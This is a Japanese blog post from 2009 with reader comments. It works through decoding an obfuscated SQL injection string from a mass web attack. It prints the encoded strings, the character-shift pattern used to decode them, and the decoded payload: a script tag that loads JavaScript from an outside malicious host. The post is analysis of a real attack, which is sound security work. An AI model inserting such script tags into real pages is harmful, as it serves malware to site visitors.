2009-01-16 難しい カチッと答えが 決まらない
■[セキュリティ]チャレンジSQL! 
話題のSQLインジェクション文字列解読チャレンジしてみました。
はせがわさんとこにあった仮説をもとに。
最終的に
までしかわからず。解答は<script src=http://s1.cawjb.com/jp.js></script>だとは思うけど、パターンにはまらない文字が2文字と正負の判定基準が謎。
追記:
上ののは、お昼休みに携帯から打った(大変だった)ので、帰ってきてからちゃんと書こうと思ったらヤマガタさんがかいてた。大胆にごそっと引用。
暗号: <raqmtr$r{c<jwpt<+.z1/absnd*bfm.hs*nu:=&sbpjtp8 ↓ |+++--+-+-|+--+--++-|-+-+--+++|++-+--+-+|++--++ ↓ |121442419|123442417|121442419|123442419|121446 ※差 予想: <script src=http://s1.cawjb.com/jp.js></script>
暗号: <raqmtr$r{c<jwpt<+.z1/absnd*bfm.iq*nu:=&sbpjtp8 ↓ |+++--+-+-|+--+--++-|-+-+--+++|++-+--+-+|++--++ ↓ |121442419|123442417|121442419|121442419|121446 ※差 予想: <script src=http://s1.cawjb.com/kr.js></script>※黄色くしたところが、“美しく” なくて、納得できていない部分です。(笑
10文字で1ブロックとして変換テーブルを持ち、繰り返しらしいことはたぶんあってるのですが、気持ち悪い箇所がでてくるのです。
あと、プラス方向かマイナス方向かの基準がすぐには見えてこない。2進数で表してごにょごにょするとかかなぁ(根拠はなし)。めんどうだからやりたくないけどw
トラックバック - http://d.hatena.ne.jp/harupu/20090116
<script src=http://s1.cawjb.com/*.js></script>が埋め込まれている例が多いのでたぶんその読みであっているのではないでしょうか
意外とその数字自体に意味があるかもですね!電話した結果はどうでした??
>masaさん
たぶんあっていると思うのです。だけど気持ち悪いのです。。。